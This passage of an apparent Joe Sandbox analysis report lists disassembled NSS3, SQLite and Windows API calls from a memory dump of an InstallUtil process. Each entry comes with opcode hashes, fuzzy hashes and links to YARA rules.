                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 587344769-0
                                                                                                                  • Opcode ID: b49c5e996120466acf95b2b518c685c78ec3f8716c6869fcc33135c133e25793
                                                                                                                  • Instruction ID: db6deead83ca447826c450e4064c0c947940f91ebd9480fafd6de6c0b591f2c2
                                                                                                                  • Opcode Fuzzy Hash: b49c5e996120466acf95b2b518c685c78ec3f8716c6869fcc33135c133e25793
                                                                                                                  • Instruction Fuzzy Hash: 6871A371E102469FEB00CF55CE44BAABBA4FF54308F554229E808D7B51FB71EAA5CB90
                                                                                                                  Function 6C790FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C791057
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C791085
                                                                                                                  • PK11_GetAllTokens.NSS3 ref: 6C7910B1
                                                                                                                  • free.MOZGLUE(?), ref: 6C791107
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C791172
                                                                                                                  • free.MOZGLUE(?), ref: 6C791182
                                                                                                                  • free.MOZGLUE(?), ref: 6C7911A6
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C7911C5
                                                                                                                    • Part of subcall function 6C7952C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C76EAC5,00000001), ref: 6C7952DF
                                                                                                                    • Part of subcall function 6C7952C0: EnterCriticalSection.KERNEL32(?), ref: 6C7952F3
                                                                                                                    • Part of subcall function 6C7952C0: PR_Unlock.NSS3(?), ref: 6C795358
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7911D3
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7911F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1549229083-0
                                                                                                                  • Opcode ID: 8c979ed04a9600a2710fa1d85b79534c375e94b09b19a78515a0d1b91ff5e2c9
                                                                                                                  • Instruction ID: 4c8eab9d1aa181ee54d277bdd7ced672b1076d7442035cc3e2ccff46d35acebe
                                                                                                                  • Opcode Fuzzy Hash: 8c979ed04a9600a2710fa1d85b79534c375e94b09b19a78515a0d1b91ff5e2c9
                                                                                                                  • Instruction Fuzzy Hash: 6E6187B4E003459BDB10DFA8EA45BAEB7B9AF04348F144134ED19AB741E731D954CB91
                                                                                                                  Function 6C79ADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                  • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                  • free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEF1
                                                                                                                  • free.MOZGLUE(6C77CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C77CDBB,?), ref: 6C79AF0B
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AF30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 161582014-0
                                                                                                                  • Opcode ID: 024cd4c49b35d12d0b56796b2e73ff7278b2606228c8bca19c73c07f1c8719b6
                                                                                                                  • Instruction ID: 6f2419887ed1219d3abc76e057d19cf23ee72ec76c0c568852dce147d3f9213e
                                                                                                                  • Opcode Fuzzy Hash: 024cd4c49b35d12d0b56796b2e73ff7278b2606228c8bca19c73c07f1c8719b6
                                                                                                                  • Instruction Fuzzy Hash: C5519FB1E01A02AFDB51DF29E989B69B7B4BF04328F144274E81997B11E731E864CBD1
                                                                                                                  Function 6C774CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C77AB7F,?,00000000,?), ref: 6C774CB4
                                                                                                                  • EnterCriticalSection.KERNEL32(0000001C,?,6C77AB7F,?,00000000,?), ref: 6C774CC8
                                                                                                                  • TlsGetValue.KERNEL32(?,6C77AB7F,?,00000000,?), ref: 6C774CE0
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,6C77AB7F,?,00000000,?), ref: 6C774CF4
                                                                                                                  • PL_HashTableLookup.NSS3(?,?,?,6C77AB7F,?,00000000,?), ref: 6C774D03
                                                                                                                  • PR_Unlock.NSS3(?,00000000,?), ref: 6C774D10
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PR_Now.NSS3(?,00000000,?), ref: 6C774D26
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C774D98
                                                                                                                  • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C774DDA
                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C774E02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4032354334-0
                                                                                                                  • Opcode ID: 83550a2dde8acb7d5aa047771fe242ddc92aafb8ba9f96030d5478780b343de4
                                                                                                                  • Instruction ID: 94d618551633ea3544c19ef8e1afe8cb1d1a44060fcb29719a9c8507d22019de
                                                                                                                  • Opcode Fuzzy Hash: 83550a2dde8acb7d5aa047771fe242ddc92aafb8ba9f96030d5478780b343de4
                                                                                                                  • Instruction Fuzzy Hash: 3F41F7B5900205ABEF215F29EE49A6A77A8AF1535CF044130ED18C7B12FB31D924DBE1
                                                                                                                  Function 6C752E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C752CDA,?,00000000), ref: 6C752E1E
                                                                                                                    • Part of subcall function 6C7AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C759003,?), ref: 6C7AFD91
                                                                                                                    • Part of subcall function 6C7AFD80: PORT_Alloc_Util.NSS3(A4686C7B,?), ref: 6C7AFDA2
                                                                                                                    • Part of subcall function 6C7AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C7B,?,?), ref: 6C7AFDC4
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C752E33
                                                                                                                    • Part of subcall function 6C7AFD80: free.MOZGLUE(00000000,?,?), ref: 6C7AFDD1
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C752E4E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C752E5E
                                                                                                                  • PL_HashTableLookup.NSS3(?), ref: 6C752E71
                                                                                                                  • PL_HashTableRemove.NSS3(?), ref: 6C752E84
                                                                                                                  • PL_HashTableAdd.NSS3(?,00000000), ref: 6C752E96
                                                                                                                  • PR_Unlock.NSS3 ref: 6C752EA9
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C752EB6
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C752EC5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3332421221-0
                                                                                                                  • Opcode ID: b8b26e4329886aa02503e15ee1a71f8f75bed734c72bfd639f8055f39e738d5a
                                                                                                                  • Instruction ID: b60634dd5843bfb6ec1c72961d88ae1c0dcac552a0160bea1cee5e6c015e8c4a
                                                                                                                  • Opcode Fuzzy Hash: b8b26e4329886aa02503e15ee1a71f8f75bed734c72bfd639f8055f39e738d5a
                                                                                                                  • Instruction Fuzzy Hash: CF212972B00101A7EF111B64ED0EA9B3B78EB5235DF044530ED1896711FB32D96AC7E1
                                                                                                                  Function 6C6DCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6DB999), ref: 6C6DCFF3
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C6DB999), ref: 6C6DD02B
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C6DB999), ref: 6C6DD041
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C6DB999), ref: 6C82972B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 491875419-598938438
                                                                                                                  • Opcode ID: c2d01e418e08278687e805e206b38cfaec8d31fe2f024aabc6e633638bfaf9e1
                                                                                                                  • Instruction ID: ea50cb07b19b4d6d8890910523383ffdf2b2495b0d1ab7fb9b18b223fcad22dc
                                                                                                                  • Opcode Fuzzy Hash: c2d01e418e08278687e805e206b38cfaec8d31fe2f024aabc6e633638bfaf9e1
                                                                                                                  • Instruction Fuzzy Hash: 15616771A002109FC320CF29C940BA6B7F2EF95318F6945ADE4899BB42D376E947C7E1
                                                                                                                  Function 6C862680 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 187COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_release_memory.NSS3(PR_Select(),PR_Poll()), ref: 6C86269F
                                                                                                                  • calloc.MOZGLUE(00000014,00000008), ref: 6C8626E0
                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8626F4
                                                                                                                  • PR_Sleep.NSS3(?), ref: 6C862710
                                                                                                                    • Part of subcall function 6C86C2A0: PR_IntervalNow.NSS3 ref: 6C86C2BE
                                                                                                                    • Part of subcall function 6C86C2A0: PR_NewCondVar.NSS3 ref: 6C86C2CC
                                                                                                                    • Part of subcall function 6C86C2A0: EnterCriticalSection.KERNEL32(?), ref: 6C86C2E8
                                                                                                                    • Part of subcall function 6C86C2A0: PR_IntervalNow.NSS3 ref: 6C86C2F7
                                                                                                                    • Part of subcall function 6C86C2A0: _PR_MD_UNLOCK.NSS3(?), ref: 6C86C378
                                                                                                                    • Part of subcall function 6C86C2A0: DeleteCriticalSection.KERNEL32(?), ref: 6C86C390
                                                                                                                    • Part of subcall function 6C86C2A0: free.MOZGLUE(?), ref: 6C86C397
                                                                                                                    • Part of subcall function 6C8628A0: realloc.MOZGLUE(?,000000A8), ref: 6C8628EB
                                                                                                                    • Part of subcall function 6C8628A0: memset.VCRUNTIME140(-FFFFFAC0,00000000,000000A0), ref: 6C86290A
                                                                                                                  • PR_SetError.NSS3(FFFFE891,00000000), ref: 6C86287D
                                                                                                                  • free.MOZGLUE(?), ref: 6C86288B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalErrorIntervalSectionfree$CondDeleteEnterSleepcallocmemsetreallocsqlite3_release_memory
                                                                                                                  • String ID: PR_Poll()$PR_Select()
                                                                                                                  • API String ID: 3069664790-3034026096
                                                                                                                  • Opcode ID: 45f87fc6976008381a0e1f82dcbf199e501d87fc9bb1fb3f88df5fc46dbd4fce
                                                                                                                  • Instruction ID: 6abb94c765075a43aa07839e022e219b1d2f44613a0e8eaee5c717c496eac4f4
                                                                                                                  • Opcode Fuzzy Hash: 45f87fc6976008381a0e1f82dcbf199e501d87fc9bb1fb3f88df5fc46dbd4fce
                                                                                                                  • Instruction Fuzzy Hash: 0E61F575A002168FDB20CF5ACE487AAB7B1FF45308F1489B8DD199BB51E739D804CB91
                                                                                                                  Function 6C7B4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C7B536F,00000022,?,?,00000000,?), ref: 6C7B4E70
                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C7B4F28
                                                                                                                  • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C7B4F8E
                                                                                                                  • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C7B4FAE
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4FC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                  • String ID: %s=%c%s%c$%s=%s$oS{l"
                                                                                                                  • API String ID: 2709355791-2022856421
                                                                                                                  • Opcode ID: 5033b1cf98950bb937eca10a21ba03e66ab14e07e2f10ffc26bfbb8e03a15632
                                                                                                                  • Instruction ID: 5b079d45fab39a2843a18f60a7a3525fb4f9d09af85928af989c6628956ff8b8
                                                                                                                  • Opcode Fuzzy Hash: 5033b1cf98950bb937eca10a21ba03e66ab14e07e2f10ffc26bfbb8e03a15632
                                                                                                                  • Instruction Fuzzy Hash: 93512561A051568BEF01CEA98A907FF7BF99F42308F288135F894B7A41D335980597A1
                                                                                                                  Function 6C7DEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEF6D
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • htonl.WSOCK32(00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEFE4
                                                                                                                  • htonl.WSOCK32(?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DEFF1
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7FA4A1,?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DF00B
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C7FA4A1,?,00000000,?,00000001), ref: 6C7DF027
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonlmemcpy$ErrorValue
                                                                                                                  • String ID: dtls13
                                                                                                                  • API String ID: 242828995-1883198198
                                                                                                                  • Opcode ID: 029e965daad0d6c8d7548185073a29b2dfd00bbfe511f0d67ea6c62c91cc0845
                                                                                                                  • Instruction ID: 79d84a6b2881017be644e91e3ea868d60bf45c6d74eb4026b4761e53ae068429
                                                                                                                  • Opcode Fuzzy Hash: 029e965daad0d6c8d7548185073a29b2dfd00bbfe511f0d67ea6c62c91cc0845
                                                                                                                  • Instruction Fuzzy Hash: A4311471A00215AFCB10DF28DE80B9AB7E4EF49348F168439E8189B751E731F915CBE2
                                                                                                                  Function 6C75AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C75AFBE
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C879500,6C753F91), ref: 6C75AFD2
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C75B007
                                                                                                                    • Part of subcall function 6C7A6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C751666,?,6C75B00C,?), ref: 6C7A6AFB
                                                                                                                  • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C75B02F
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C75B046
                                                                                                                  • PL_FreeArenaPool.NSS3 ref: 6C75B058
                                                                                                                  • PL_FinishArenaPool.NSS3 ref: 6C75B060
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3627567351-3315324353
                                                                                                                  • Opcode ID: 7f5547b5656c665daaea74c22b7a7f3034f20d38791fda4e46c83add17c00fda
                                                                                                                  • Instruction ID: 33d3cb72e07674aa92f1601acd87a8abe80f91642bc0dec368b2883eebd8167c
                                                                                                                  • Opcode Fuzzy Hash: 7f5547b5656c665daaea74c22b7a7f3034f20d38791fda4e46c83add17c00fda
                                                                                                                  • Instruction Fuzzy Hash: 07314C7140430097D7208F14DE49BBA77A4AF8632CF500B28F9786BBC1E732A219C797
                                                                                                                  Function 6C79CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C79CD08
                                                                                                                  • PK11_DoesMechanism.NSS3(?,?), ref: 6C79CE16
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C79D079
